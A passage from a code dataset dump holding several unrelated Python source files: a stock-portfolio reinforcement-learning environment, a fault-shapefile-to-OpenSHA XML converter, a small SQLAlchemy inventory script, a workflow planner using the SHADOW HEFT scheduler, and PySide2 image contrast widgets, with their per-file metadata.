spaces.Box(-np.inf, np.inf, shape=(env.num_stocks, self.num_news,\n max_seq_length), dtype=np.uint32)\n ))\n\n def observation(self, observation):\n close_ratio = self.get_normalized_close_ratio(observation)\n news = observation.get_news()\n news_obs = self.tokenize_news(news)\n return (close_ratio, news_obs)\n\n def get_normalized_close_ratio(self, observation):\n close_ratio = observation.get_close_ratio()\n close_ratio = (close_ratio - 1.) * 100\n return close_ratio\n\n def tokenize_news(self, news):\n \"\"\"\n\n Args:\n news: a list of list of sentences\n\n Returns: idx in the current tokenizer.\n\n \"\"\"\n output = []\n for stock_news in news:\n stock_news_idx = []\n assert len(stock_news) == self.num_news, \"Number of news {} doesn't match required {}\".format(\n len(stock_news), self.num_news)\n for each_news in stock_news:\n try:\n tokens = self.tokenizer.tokenize(each_news)[:self.max_seq_length - 2]\n except:\n tokens = []\n tokens = [\"[CLS]\"] + tokens + [\"[SEP]\"]\n input_ids = self.tokenizer.convert_tokens_to_ids(tokens)\n while len(input_ids) < self.max_seq_length:\n input_ids.append(0)\n stock_news_idx.append(input_ids)\n output.append(stock_news_idx)\n\n output = np.array(output)\n return output\n\n\n# Observation wrapper for price only and news only env\n\nclass PortfolioEnvPriceOnlyWrapper(PortfolioEnvObsReshapeWrapper):\n def __init__(self, env):\n super(PortfolioEnvPriceOnlyWrapper, self).__init__(env)\n self.observation_space = gym.spaces.Box(-np.inf, np.inf, shape=(1,), dtype=np.float32)\n\n def observation(self, observation):\n return self.get_normalized_close_ratio(observation)\n\n\nclass PortfolioEnvNewsOnlyWrapper(PortfolioEnvObsReshapeWrapper):\n def __init__(self, env: PortfolioEnv,\n tokenizer=BertTokenizer.from_pretrained('bert-base-uncased', do_lower_case=True),\n max_seq_length=128):\n super(PortfolioEnvNewsOnlyWrapper, self).__init__(env, tokenizer, max_seq_length)\n self.observation_space = gym.spaces.Box(-np.inf, np.inf, shape=(env.num_stocks, self.num_news,\n max_seq_length), dtype=np.uint32)\n\n def observation(self, observation):\n news = observation.get_news()\n observation = self.tokenize_news(news)\n return observation\n\n\n# reward shaping. Only care about whether we make money or lose money instead of the actual amount.\n\nclass PortfolioRewardWrapper(gym.RewardWrapper):\n def reward(self, reward):\n if reward > 0.0:\n reward = 1\n elif reward == 0.0:\n reward = 0\n else:\n reward = -1\n\n return reward\n", "sub_path": "project/portfolio_mangement/envs/portfolio.py", "file_name": "portfolio.py", "file_ext": "py", "file_size_in_byte": 15217, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "13", "api": [{"api_name": "numpy.sqrt", "line_number": 21, "usage_type": "call"}, {"api_name": "numpy.mean", "line_number": 21, "usage_type": "call"}, {"api_name": "torchlib.common.eps", "line_number": 21, "usage_type": "name"}, {"api_name": "numpy.std", "line_number": 21, "usage_type": "call"}, {"api_name": "torchlib.common.eps", "line_number": 28, "usage_type": "name"}, {"api_name": "collections.OrderedDict", "line_number": 53, "usage_type": "name"}, {"api_name": "pandas.Timestamp", "line_number": 63, "usage_type": "call"}, {"api_name": "pandas.Timestamp", "line_number": 70, "usage_type": "call"}, {"api_name": "pandas.Timestamp", "line_number": 71, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 88, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 96, "usage_type": "call"}, {"api_name": "pandas.Timedelta", "line_number": 100, "usage_type": "call"}, {"api_name": "pandas.Timedelta", "line_number": 105, "usage_type": "call"}, {"api_name": "numpy.random.randint", "line_number": 131, "usage_type": "call"}, {"api_name": "numpy.random", "line_number": 131, "usage_type": "attribute"}, {"api_name": "numpy.dot", "line_number": 163, "usage_type": "call"}, {"api_name": "torchlib.common.eps", "line_number": 163, "usage_type": "name"}, {"api_name": "numpy.abs", "line_number": 165, "usage_type": "call"}, {"api_name": "numpy.dot", "line_number": 169, "usage_type": "call"}, {"api_name": "numpy.log", "line_number": 174, "usage_type": "call"}, {"api_name": "torchlib.common.eps", "line_number": 174, "usage_type": "name"}, {"api_name": "numpy.array", "line_number": 200, "usage_type": "call"}, {"api_name": "gym.Env", "line_number": 203, "usage_type": "attribute"}, {"api_name": "gym.spaces.Box", "line_number": 244, "usage_type": "call"}, {"api_name": "gym.spaces", "line_number": 244, "usage_type": "attribute"}, {"api_name": "numpy.float32", "line_number": 245, "usage_type": "attribute"}, {"api_name": "numpy.array", "line_number": 255, "usage_type": "call"}, {"api_name": "numpy.ndarray", "line_number": 257, "usage_type": "attribute"}, {"api_name": "numpy.testing.assert_almost_equal", "line_number": 259, "usage_type": "call"}, {"api_name": "numpy.testing", "line_number": 259, "usage_type": "attribute"}, {"api_name": "numpy.clip", "line_number": 265, "usage_type": "call"}, {"api_name": "torchlib.common.eps", "line_number": 268, "usage_type": "name"}, {"api_name": "numpy.clip", "line_number": 269, "usage_type": "call"}, {"api_name": "numpy.testing.assert_almost_equal", "line_number": 272, "usage_type": "call"}, {"api_name": "numpy.testing", "line_number": 272, "usage_type": "attribute"}, {"api_name": "numpy.sum", "line_number": 273, "usage_type": "call"}, {"api_name": "numpy.insert", "line_number": 279, "usage_type": "call"}, {"api_name": "numpy.cumprod", "line_number": 283, "usage_type": "call"}, {"api_name": "pprint.pprint", "line_number": 303, "usage_type": "call"}, {"api_name": "pandas.DataFrame", "line_number": 312, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.gcf", "line_number": 317, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 317, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.show", "line_number": 318, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 318, "usage_type": "name"}, {"api_name": "gym.ObservationWrapper", "line_number": 322, "usage_type": "attribute"}, {"api_name": "pytorch_pretrained_bert.BertTokenizer.from_pretrained", "line_number": 324, "usage_type": "call"}, {"api_name": "pytorch_pretrained_bert.BertTokenizer", "line_number": 324, "usage_type": "name"}, {"api_name": "gym.spaces.Tuple", "line_number": 330, "usage_type": "call"}, {"api_name": "gym.spaces", "line_number": 330, "usage_type": "name"}, {"api_name": "gym.spaces.Box", "line_number": 330, "usage_type": "call"}, {"api_name": "numpy.inf", "line_number": 330, "usage_type": "attribute"}, {"api_name": "numpy.float32", "line_number": 330, "usage_type": "attribute"}, {"api_name": "gym.spaces.Box", "line_number": 331, "usage_type": "call"}, {"api_name": "gym.spaces", "line_number": 331, "usage_type": "name"}, {"api_name": "numpy.inf", "line_number": 331, "usage_type": "attribute"}, {"api_name": "numpy.uint32", "line_number": 332, "usage_type": "attribute"}, {"api_name": "numpy.array", "line_number": 372, "usage_type": "call"}, {"api_name": "gym.spaces.Box", "line_number": 381, "usage_type": "call"}, {"api_name": "gym.spaces", "line_number": 381, "usage_type": "attribute"}, {"api_name": "numpy.inf", "line_number": 381, "usage_type": "attribute"}, {"api_name": "numpy.float32", "line_number": 381, "usage_type": "attribute"}, {"api_name": "pytorch_pretrained_bert.BertTokenizer.from_pretrained", "line_number": 389, "usage_type": "call"}, {"api_name": "pytorch_pretrained_bert.BertTokenizer", "line_number": 389, "usage_type": "name"}, {"api_name": "gym.spaces.Box", "line_number": 392, "usage_type": "call"}, {"api_name": "gym.spaces", "line_number": 392, "usage_type": "attribute"}, {"api_name": "numpy.inf", "line_number": 392, "usage_type": "attribute"}, {"api_name": "numpy.uint32", "line_number": 393, "usage_type": "attribute"}, {"api_name": "gym.RewardWrapper", "line_number": 403, "usage_type": "attribute"}]} +{"seq_id": "634527960", "text": "import geopandas as gpd\nimport pandas as pd\nimport xml.etree.ElementTree as ET\nfrom xml.dom import minidom\nfrom shapely.geometry import LineString\nfrom typing import Union\nimport numpy as np\n\n\ndef calculate_dip_direction(line: LineString):\n \"\"\"\n Calculate the strike of a shapely linestring object with coordinates in NZTM,\n then adds 90 to get dip direction.\n :param line: Linestring object\n :return:\n \"\"\"\n # Get coordinates\n x, y = line.xy\n # Calculate gradient of line in 2D\n p = np.polyfit(x, y, 1)\n gradient = p[0]\n # Gradient to bearing\n bearing = 180 - np.degrees(np.arctan2(gradient, 1))\n\n # Needs to be improved... Basic method of defining quadrant\n if x[0] > x[-1]:\n bearing += 180.\n\n # Ensure strike is between zero and 360 (bearing)\n while bearing < 0:\n bearing += 360.\n\n while bearing >= 360.:\n bearing -= 360.\n\n return bearing\n\n\ndef root_mean_square(value_array: Union[np.ndarray, list, tuple]):\n \"\"\"\n Helper function to turn max and min to stdev for inclusion in XML.\n :param value_array: Differences of values (e.g. sr_min and sr_max) from mean.\n :return:\n \"\"\"\n data_array = np.array(value_array)\n assert all([data_array.size > 0, data_array.ndim == 1])\n rms = np.sqrt(np.mean(np.square(data_array)))\n return rms\n\n\n# Currently does nothing... Could be used to implement checks on parameters\nrequired_values = ['Depth_Best', 'Depth_Max', 'Depth_Min', 'Dip_Best',\n 'Dip_Dir', 'Dip_Max', 'Dip_Min', 'FZ_Name', 'Name', 'Number',\n 'Qual_Code', 'Rake_Best', 'Rake_Max', 'Rake_Min', 'Sense_Dom',\n 'Sense_Sec', 'Source1_1', 'Source2', 'SR_Best', 'SR_Max', 'SR_Min',\n 'geometry']\n\n\ndef fault_model_xml(fault_info: pd.Series, section_id: int, nztm_geometry: LineString):\n \"\"\"\n To generate XML element containing fault metadata from shapefile\n :param fault_info:\n :param section_id:\n :param nztm_geometry:\n :return:\n \"\"\"\n # Calculate uncertainty on slip rate and dip direction\n sr_stdev = root_mean_square(np.array([fault_info[\"SR_Max\"], fault_info[\"SR_Min\"]]) - fault_info[\"SR_Best\"])\n dip_direction = calculate_dip_direction(nztm_geometry)\n\n # Unique fault identifier\n tag_name = \"i{:d}\".format(section_id)\n # Metadata\n attribute_dic = {\"sectionId\": \"{:d}\".format(section_id),\n \"sectionName\": fault_info.Name,\n \"aveLongTermSlipRate\": \"{:.1f}\".format(fault_info[\"SR_Best\"]),\n \"slipRateStDev\": \"{:.1f}\".format(sr_stdev),\n \"aveDip\": \"{:.1f}\".format(fault_info[\"Dip_Best\"]),\n \"aveRake\": \"{:.1f}\".format(fault_info[\"Rake_Best\"]),\n \"aveUpperDepth\": \"0.0\",\n \"aveLowerDepth\": \"{:.1f}\".format(fault_info[\"Depth_Best\"]),\n \"aseismicSlipFactor\": \"0.0\",\n \"couplingCoeff\": \"1.0\",\n \"dipDirection\": \"{:.1f}\".format(dip_direction),\n \"parentSectionId\": \"-1\",\n \"connector\": \"false\"\n }\n # Initialize XML element\n fault_element = ET.Element(tag_name, attrib=attribute_dic)\n # Add sub element for fault trace\n trace_element = fault_trace_xml(fault_info.geometry, fault_info.Name)\n fault_element.append(trace_element)\n return fault_element\n\n\ndef fault_trace_xml(geometry: LineString, section_name: str, z: Union[float, int] = 0):\n trace_element = ET.Element(\"FaultTrace\", attrib={\"name\": section_name})\n ll_float_str = \"{:.4f}\"\n # extract arrays of lon and lat\n x, y = geometry.xy\n # Loop through addis each coordinate as sub element\n for x_i, y_i in zip(x, y):\n loc_element = ET.Element(\"Location\", attrib={\"Latitude\": ll_float_str.format(y_i),\n \"Longitude\": ll_float_str.format(x_i),\n \"Depth\": ll_float_str.format(z)})\n trace_element.append(loc_element)\n\n return trace_element\n\n\n# Example file; should work on whole dataset too\nshp_file = \"/Users/arh79/PycharmProjects/eq-fault-geom/data/cfm_shapefile/cfm_lower_n_island.shp\"\n\n# read in data\nshp_df = gpd.GeoDataFrame.from_file(shp_file)\n# Sort alphabetically by name\nsorted_df = shp_df.sort_values(\"Name\")\n# Reset index to line up with alphabetical sorting\nsorted_df = sorted_df.reset_index(drop=True)\n# Reproject traces into lon lat\nsorted_wgs = sorted_df.to_crs(epsg=4326)\n\n# Base XML element\nopensha_element = ET.Element(\"OpenSHA\")\n# Fault model sub element\nfm_element = ET.Element(\"FaultModel\")\nopensha_element.append(fm_element)\n\n# Loop through faults, creating XML elements\nfor i, fault in sorted_wgs.iterrows():\n # Extract NZTM line for dip direction calculation/could be done in a better way, I'm sure\n nztm_geometry_i = sorted_df.iloc[i].geometry\n # Add to XML tree\n opensha_element.append(fault_model_xml(fault, section_id=i, nztm_geometry=nztm_geometry_i))\n\n# Awkward way of getting the xml file to be written in a way that's easy to read.\nxml_dom = minidom.parseString(ET.tostring(opensha_element, encoding=\"UTF-8\", xml_declaration=True))\npretty_xml_str = xml_dom.toprettyxml(indent=\" \", encoding=\"utf-8\")\n\n# Write output to file\nwith open(\"test2.xml\", \"wb\") as fid:\n fid.write(pretty_xml_str)\n", "sub_path": "src/eq_fault_geom/geomio/read_cfm_shp.py", "file_name": "read_cfm_shp.py", "file_ext": "py", "file_size_in_byte": 5395, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "13", "api": [{"api_name": "shapely.geometry.LineString", "line_number": 10, "usage_type": "name"}, {"api_name": "numpy.polyfit", "line_number": 20, "usage_type": "call"}, {"api_name": "numpy.degrees", "line_number": 23, "usage_type": "call"}, {"api_name": "numpy.arctan2", "line_number": 23, "usage_type": "call"}, {"api_name": "typing.Union", "line_number": 39, "usage_type": "name"}, {"api_name": "numpy.ndarray", "line_number": 39, "usage_type": "attribute"}, {"api_name": "numpy.array", "line_number": 45, "usage_type": "call"}, {"api_name": "numpy.sqrt", "line_number": 47, "usage_type": "call"}, {"api_name": "numpy.mean", "line_number": 47, "usage_type": "call"}, {"api_name": "numpy.square", "line_number": 47, "usage_type": "call"}, {"api_name": "pandas.Series", "line_number": 59, "usage_type": "attribute"}, {"api_name": "shapely.geometry.LineString", "line_number": 59, "usage_type": "name"}, {"api_name": "numpy.array", "line_number": 68, "usage_type": "call"}, {"api_name": "xml.etree.ElementTree.Element", "line_number": 89, "usage_type": "call"}, {"api_name": "xml.etree.ElementTree", "line_number": 89, "usage_type": "name"}, {"api_name": "shapely.geometry.LineString", "line_number": 96, "usage_type": "name"}, {"api_name": "typing.Union", "line_number": 96, "usage_type": "name"}, {"api_name": "xml.etree.ElementTree.Element", "line_number": 97, "usage_type": "call"}, {"api_name": "xml.etree.ElementTree", "line_number": 97, "usage_type": "name"}, {"api_name": "xml.etree.ElementTree.Element", "line_number": 103, "usage_type": "call"}, {"api_name": "xml.etree.ElementTree", "line_number": 103, "usage_type": "name"}, {"api_name": "geopandas.GeoDataFrame.from_file", "line_number": 115, "usage_type": "call"}, {"api_name": "geopandas.GeoDataFrame", "line_number": 115, "usage_type": "attribute"}, {"api_name": "xml.etree.ElementTree.Element", "line_number": 124, "usage_type": "call"}, {"api_name": "xml.etree.ElementTree", "line_number": 124, "usage_type": "name"}, {"api_name": "xml.etree.ElementTree.Element", "line_number": 126, "usage_type": "call"}, {"api_name": "xml.etree.ElementTree", "line_number": 126, "usage_type": "name"}, {"api_name": "xml.dom.minidom.parseString", "line_number": 137, "usage_type": "call"}, {"api_name": "xml.dom.minidom", "line_number": 137, "usage_type": "name"}, {"api_name": "xml.etree.ElementTree.tostring", "line_number": 137, "usage_type": "call"}, {"api_name": "xml.etree.ElementTree", "line_number": 137, "usage_type": "name"}]} +{"seq_id": "30389244", "text": "from sqlalchemy import create_engine\nfrom sqlalchemy import Column,String, Integer, ForeignKey, Date\nfrom sqlalchemy.ext.declarative import declarative_base\nfrom sqlalchemy.orm import sessionmaker, relationship\nimport psycopg2\nfrom datetime import date\n\n#create DB engine\ndbString = \"postgresql://postgres:root@localhost:5432/simpleInventory\"\ndb = create_engine(dbString)\n\n#What the hell is this?\nbase= declarative_base()\n\nclass Item(base):\n __tablename__='item'\n id = Column(Integer, primary_key=True)\n name= Column(String)\n #created=relationship(\"Creation\")\n\n def __init__(self,name):\n self.name=name\n\nclass Creation(base):\n __tablename__='creationmaster'\n id= Column(Integer, primary_key=True)\n date= Column(Date, nullable=False)\n amount= Column(Integer, nullable=False) #store as negative value if thrown or sold\n action= Column(String, nullable=False) # created,thrown or sold)\n itemId=Column(Integer, ForeignKey('item.id'))\n item = relationship('Item',backref=\"created\")\n \n def __init__(self,date,amount,action,item):\n self.date=date\n self.amount=amount\n self.action=action\n self.item=item\n \n\nSession = sessionmaker(db)\nsession = Session()\n\nbase.metadata.create_all(db)\n\neggMuffin = Item(\"Egg\")\neggMuffinCreation=Creation(date(2022,8,1),7,\"New\",eggMuffin)\n\nsession.add(eggMuffin)\nsession.add(eggMuffinCreation)\nsession.commit()\nsession.close()", "sub_path": "app.py", "file_name": "app.py", "file_ext": "py", "file_size_in_byte": 1434, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "13", "api": [{"api_name": "sqlalchemy.create_engine", "line_number": 10, "usage_type": "call"}, {"api_name": "sqlalchemy.ext.declarative.declarative_base", "line_number": 13, "usage_type": "call"}, {"api_name": "sqlalchemy.Column", "line_number": 17, "usage_type": "call"}, {"api_name": "sqlalchemy.Integer", "line_number": 17, "usage_type": "argument"}, {"api_name": "sqlalchemy.Column", "line_number": 18, "usage_type": "call"}, {"api_name": "sqlalchemy.String", "line_number": 18, "usage_type": "argument"}, {"api_name": "sqlalchemy.Column", "line_number": 26, "usage_type": "call"}, {"api_name": "sqlalchemy.Integer", "line_number": 26, "usage_type": "argument"}, {"api_name": "datetime.date", "line_number": 27, "usage_type": "name"}, {"api_name": "sqlalchemy.Column", "line_number": 27, "usage_type": "call"}, {"api_name": "sqlalchemy.Date", "line_number": 27, "usage_type": "argument"}, {"api_name": "sqlalchemy.Column", "line_number": 28, "usage_type": "call"}, {"api_name": "sqlalchemy.Integer", "line_number": 28, "usage_type": "argument"}, {"api_name": "sqlalchemy.Column", "line_number": 29, "usage_type": "call"}, {"api_name": "sqlalchemy.String", "line_number": 29, "usage_type": "argument"}, {"api_name": "sqlalchemy.Column", "line_number": 30, "usage_type": "call"}, {"api_name": "sqlalchemy.Integer", "line_number": 30, "usage_type": "argument"}, {"api_name": "sqlalchemy.ForeignKey", "line_number": 30, "usage_type": "call"}, {"api_name": "sqlalchemy.orm.relationship", "line_number": 31, "usage_type": "call"}, {"api_name": "datetime.date", "line_number": 34, "usage_type": "name"}, {"api_name": "sqlalchemy.orm.sessionmaker", "line_number": 40, "usage_type": "call"}, {"api_name": "datetime.date", "line_number": 46, "usage_type": "call"}]} +{"seq_id": "654304183", "text": "import sys\nimport logging\nfrom enum import Enum\n# sys.path.append(path.abspath('../../shadow'))\n\nfrom topsim.core.task import Task\n\nfrom shadow.models.workflow import Workflow as ShadowWorkflow\nfrom shadow.models.environment import Environment as ShadowEnvironment\nfrom shadow.algorithms.heuristic import heft as shadow_heft\n\n\n\nlogger = logging.getLogger(__name__)\n\n# BUFFER_OFFSET = config_data.buffer_offset\n# from core.telescope import Observation\n\n\nclass Planner(object):\n\t\"\"\"\n\tThe Planner is our interface with static scheduling algorithms. It provides\n\tan interface to other libraries and selects the library based on the provided\n\talgorithms based to the _init_. Currently, the SHADOW library is the only\n\tlibrary that the Planner is aligned with; this may change in the future.\n\t\"\"\"\n\n\tdef __init__(self, env, algorithm, cluster):\n\t\tself.env = env\n\t\tself.cluster = cluster\n\t\t# self.envconfig = envconfig\n\t\tself.algorithm = algorithm\n\n\tdef run(self, observation):\n\t\t# wfid = observation.name\n\t\tobservation.plan = self.plan(observation.name, observation.workflow,\n\t\t\t\t\t\t\t\t\t self.algorithm)\n\t\tyield self.env.timeout(0)\n\n\tdef plan(self, name, workflow, algorithm):\n\t\tworkflow = ShadowWorkflow(workflow)\n\t\tavailable_resources = self.cluster_to_shadow_format()\n\t\tworkflow_env = ShadowEnvironment(available_resources, dictionary=True)\n\t\tworkflow.add_environment(workflow_env)\n\t\tplan = WorkflowPlan(name, workflow, algorithm, self.env)\n\t\treturn plan\n\n\tdef cluster_to_shadow_format(self):\n\t\t\"\"\"\n\t\tGiven the cluster, select from the available resources to allocate\n\t\tand create a dictionary in the format required for shadow.\n\t\t:return: dictionary of machine requirements\n\t\t\"\"\"\n\t\tsdict = {}\n\t\t# \"flops\": 84,\n\t\t# \"rates\": 10\n\t\t# \"costs\": 0.7\n\t\tavailable_resources = self.cluster.available_resources\n\t\tdictionary = {\n\t\t\t\"system\": {\n\t\t\t\t\"resources\": None,\n\t\t\t\t\"bandwidth\": self.cluster.system_bandwidth\n\t\t\t}\n\t\t}\n\t\tresources = {}\n\t\tfor m in available_resources:\n\t\t\tresources[m.id] = {\n\t\t\t\t\"flops\": m.cpu,\n\t\t\t\t\"rates\": m.bandwidth,\n\t\t\t\t\"io\": m.disk,\n\t\t\t\t\"memory\": m.memory\n\t\t\t}\n\t\tdictionary['system']['resources'] = resources\n\n\t\treturn dictionary\n\n# for machine in available_resources:\n\n\nclass WorkflowStatus(int, Enum):\n\tUNSCHEDULED = 1\n\tSCHEDULED = 2\n\tON_TIME = 3\n\tDELAYED = 4\n\tFINISHED = 5\n\n\nclass WorkflowPlan(object):\n\t\"\"\"\n\tWorkflowPlans are used within the Planner, SchedulerA Actors and Cluster Resource. They are higher-level than the\n\tshadow library representation, as they are a storage component of scheduled tasks, rather than directly representing\n\tthe DAG nature of the workflow. This is why the tasks are stored in queues.\n\t\"\"\"\n\n\tdef __init__(self, wid, workflow, algorithm, env):\n\t\tself.id = wid\n\t\tif algorithm is 'heft':\n\t\t\tself.solution = shadow_heft(workflow)\n\t\telse:\n\t\t\tsys.exit(\"Other algorithms are not supported\")\n\n\t\t# DO Task execution things here\n\t\ttaskid = 0\n\t\tast = 1\n\t\taft = 2\n\t\tself.tasks = []\n\t\ttask_order = []\n\n\t\t# The solution object is now how we get information on allocatiosn from SHADOW\n\n\t\tfor task in self.solution.task_allocations:\n\t\t\tallocation = self.solution.task_allocations.get(task)\n\t\t\ttaskobj = Task(task.tid, env)\n\t\t\ttaskobj.est = allocation.ast\n\t\t\ttaskobj.eft = allocation.aft\n\t\t\ttaskobj.duration = taskobj.eft - taskobj.est\n\t\t\ttaskobj.machine_id = allocation.machine\n\t\t\ttaskobj.flops = task.flops_demand\n\t\t\ttaskobj.pred = list(workflow.graph.predecessors(task))\n\t\t\tself.tasks.append(taskobj)\n\t\tself.tasks.sort(key=lambda x: x.est)\n\t\tself.exec_order = self.solution.execution_order\n\t\tself.start_time = None\n\t\tself.priority = 0\n\t\tself.status = WorkflowStatus.UNSCHEDULED\n\t\tself.delayed = None\n\n\tdef __lt__(self, other):\n\t\treturn self.priority < other.priority\n\n\tdef __eq__(self, other):\n\t\treturn self.priority == other.priority\n\n\tdef __gt__(self, other):\n\t\treturn self.priority > other.priority\n\n\n\n", "sub_path": "topsim/core/planner.py", "file_name": "planner.py", "file_ext": "py", "file_size_in_byte": 3836, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "13", "api": [{"api_name": "logging.getLogger", "line_number": 14, "usage_type": "call"}, {"api_name": "shadow.models.workflow.Workflow", "line_number": 41, "usage_type": "call"}, {"api_name": "shadow.models.environment.Environment", "line_number": 43, "usage_type": "call"}, {"api_name": "enum.Enum", "line_number": 80, "usage_type": "name"}, {"api_name": "shadow.algorithms.heuristic.heft", "line_number": 98, "usage_type": "call"}, {"api_name": "sys.exit", "line_number": 100, "usage_type": "call"}, {"api_name": "topsim.core.task.Task", "line_number": 113, "usage_type": "call"}]} +{"seq_id": "536253665", "text": "import timeit\nimport numpy as np\nfrom PySide2.QtCore import Signal, Qt\nfrom PySide2.QtWidgets import (QToolBar,\n QAction, QComboBox, QPushButton, QLabel, \n QWidget, QDoubleSpinBox, QHBoxLayout, QVBoxLayout)\nfrom PySide2.QtGui import QIcon, QPixmap\n\nfrom wezel import icons\n\nlistColors = ['gray', 'cividis', 'magma', 'plasma', 'viridis', \n 'Greys', 'Purples', 'Blues', 'Greens', 'Oranges', 'Reds',\n 'YlOrBr', 'YlOrRd', 'OrRd', 'PuRd', 'RdPu', 'BuPu',\n 'GnBu', 'PuBu', 'YlGnBu', 'PuBuGn', 'BuGn', 'YlGn',\n 'binary', 'gist_yarg', 'gist_gray', 'bone', 'pink',\n 'spring', 'summer', 'autumn', 'winter', 'cool', 'Wistia',\n 'hot', 'afmhot', 'gist_heat', 'copper',\n 'PiYG', 'PRGn', 'BrBG', 'PuOr', 'RdGy', 'RdBu',\n 'RdYlBu', 'RdYlGn', 'Spectral', 'coolwarm', 'bwr', 'seismic',\n 'twilight', 'twilight_shifted', 'hsv',\n 'flag', 'prism', 'ocean', 'gist_earth', 'terrain', 'gist_stern',\n 'gnuplot', 'gnuplot2', 'CMRmap', 'cubehelix', 'brg', 'turbo',\n 'gist_rainbow', 'rainbow', 'jet', 'nipy_spectral', 'gist_ncar']\n\nQComboBoxStyleSheet = \"\"\"\n\nQComboBox::drop-down \n{\n border: 0px; /* This seems to replace the whole arrow of the combo box */\n}\nQComboBox:down-arrow \n{\n image: url(\"icons/fugue_icons/spectrum.png\");\n width: 14px;\n height: 14px;\n}\n\"\"\"\n\n\nclass ImageWindow(QWidget):\n \"\"\"Widget to set and manage color and window settings of a Series\"\"\"\n\n valueChanged = Signal(list) # emitted when the color settings are changed by the widget\n\n def __init__(self):\n super().__init__()\n\n # Widgets\n self.mode = LockUnlockWidget(toolTip = 'Lock image settings')\n self.upper = ImageUpper()\n self.lower = ImageLower()\n\n # Connections\n self.upper.valueChanged.connect(self._valueChanged)\n self.lower.valueChanged.connect(self._valueChanged)\n\n # Layout\n layout = QVBoxLayout()\n layout.setContentsMargins(0,0,0,0)\n layout.setSpacing(0)\n layout.addWidget(self.upper)\n layout.addWidget(self.lower)\n #self.setStyleSheet(\"background-color: white\")\n self.setLayout(layout)\n\n def _valueChanged(self):\n self.valueChanged.emit(self.getValue())\n\n def setData(self, array, center, width, set=None):\n min = np.amin(array)\n max = np.amax(array)\n if set is None:\n set = not self.mode.isLocked\n self.upper.setData(min, max, center+width/2, set)\n self.lower.setData(min, max, center-width/2, set)\n\n def getValue(self):\n upper = self.upper.getValue()\n lower = self.lower.getValue()\n brightness = (upper+lower)/2\n contrast = upper-lower\n return [brightness, contrast]\n\n def setValue(self, WindowCenter=None, WindowWidth=None):\n self.upper.setValue(WindowCenter+WindowWidth/2)\n self.lower.setValue(WindowCenter-WindowWidth/2)\n\n def isLocked(self):\n return self.mode.isLocked\n \n def spinBox(self, i):\n if i == 0:\n return self.lower.spinBox\n if i == 1:\n return self.upper.spinBox\n \n\n\nclass ImageUpper(QWidget):\n\n valueChanged = Signal(float)\n\n def __init__(self):\n super().__init__()\n\n self.label = QLabel()\n self.label.setPixmap(QPixmap(icons.arrow_stop_090))\n #self.label.setFixedSize(24, 24)\n self.spinBox = QDoubleSpinBox()\n self.spinBox.valueChanged.connect(self.spinBoxValueChanged)\n self.spinBox.setToolTip(\"Adjust upper value of color window\")\n self.spinBox.setDecimals(6)\n self.spinBox.setMinimum(-1000000000.00)\n self.spinBox.setMaximum(+1000000000.00)\n self.spinBox.setWrapping(False)\n self.spinBox.setFixedWidth(115)\n \n # Layout\n self.layout = QHBoxLayout()\n self.layout.setAlignment(Qt.AlignLeft | Qt.AlignVCenter)\n self.layout.setContentsMargins(0,0,0,0)\n self.layout.setSpacing(2)\n self.layout.addWidget(self.spinBox)\n self.layout.addWidget(self.label)\n #self.setMaximumWidth(120)\n self.setLayout(self.layout)\n\n def setData(self, min, max, value, set=True):\n self.spinBox.blockSignals(True)\n if value is None: \n self.spinBox.setValue(1) \n self.spinBox.setSingleStep(0.1)\n else:\n if set: # adjust spinbox value to image contrast\n self.spinBox.setValue(value)\n self.setSpinBoxStepSize(min, max)\n self.spinBox.blockSignals(False)\n\n def getValue(self):\n return self.spinBox.value()\n\n def setValue(self, value):\n self.spinBox.blockSignals(True)\n self.spinBox.setValue(value)\n self.spinBox.blockSignals(False)\n\n def setSpinBoxStepSize(self, min, max):\n if min is None:\n return\n width = max-min\n spinBoxStep = float(width / 5)\n self.spinBox.setSingleStep(spinBoxStep)\n\n def spinBoxValueChanged(self):\n value = self.spinBox.value() \n self.valueChanged.emit(value)\n\n\nclass ImageLower(QWidget):\n\n valueChanged = Signal(float)\n\n def __init__(self):\n super().__init__() \n self.label = QLabel()\n self.label.setPixmap(QPixmap(icons.arrow_stop_270))\n #self.label.setFixedSize(24, 24)\n self.spinBox = QDoubleSpinBox()\n self.spinBox.valueChanged.connect(self.spinBoxValueChanged)\n self.spinBox.setToolTip(\"Adjust lower value of color window\")\n self.spinBox.setDecimals(6)\n self.spinBox.setMinimum(-1000000000.00)\n self.spinBox.setMaximum(+1000000000.00)\n self.spinBox.setWrapping(False)\n self.spinBox.setFixedWidth(115)\n \n # Layout\n self.layout = QHBoxLayout()\n self.layout.setAlignment(Qt.AlignLeft | Qt.AlignVCenter)\n self.layout.setContentsMargins(0,0,0,0)\n self.layout.setSpacing(2)\n self.layout.addWidget(self.spinBox)\n self.layout.addWidget(self.label)\n #self.setMaximumWidth(120)\n self.setLayout(self.layout)\n\n def setData(self, min, max, value, set=True):\n self.spinBox.blockSignals(True)\n if value is None: \n self.spinBox.setValue(1) \n self.spinBox.setSingleStep(0.1)\n else:\n if set: # adjust spinbox value to image contrast\n self.spinBox.setValue(value)\n self.setSpinBoxStepSize(min, max)\n self.spinBox.blockSignals(False)\n\n def getValue(self):\n return self.spinBox.value()\n\n def setValue(self, value):\n self.spinBox.blockSignals(True)\n self.spinBox.setValue(value)\n self.spinBox.blockSignals(False)\n\n def setSpinBoxStepSize(self, min, max):\n if min is None:\n return\n width = max-min\n spinBoxStep = float(width / 5)\n self.spinBox.setSingleStep(spinBoxStep)\n\n def spinBoxValueChanged(self):\n value = self.spinBox.value()\n self.valueChanged.emit(value)\n\n\nclass ImageContrastWindow(QWidget):\n \"\"\"Widget to set and manage color and window settings of a Series\"\"\"\n\n valueChanged = Signal(list) # emitted when the color settings are changed by the widget\n\n def __init__(self, layout=True):\n super().__init__()\n self._setWidgets(layout)\n self._setConnections()\n if layout:\n self._setLayout()\n\n def _setWidgets(self, layout):\n 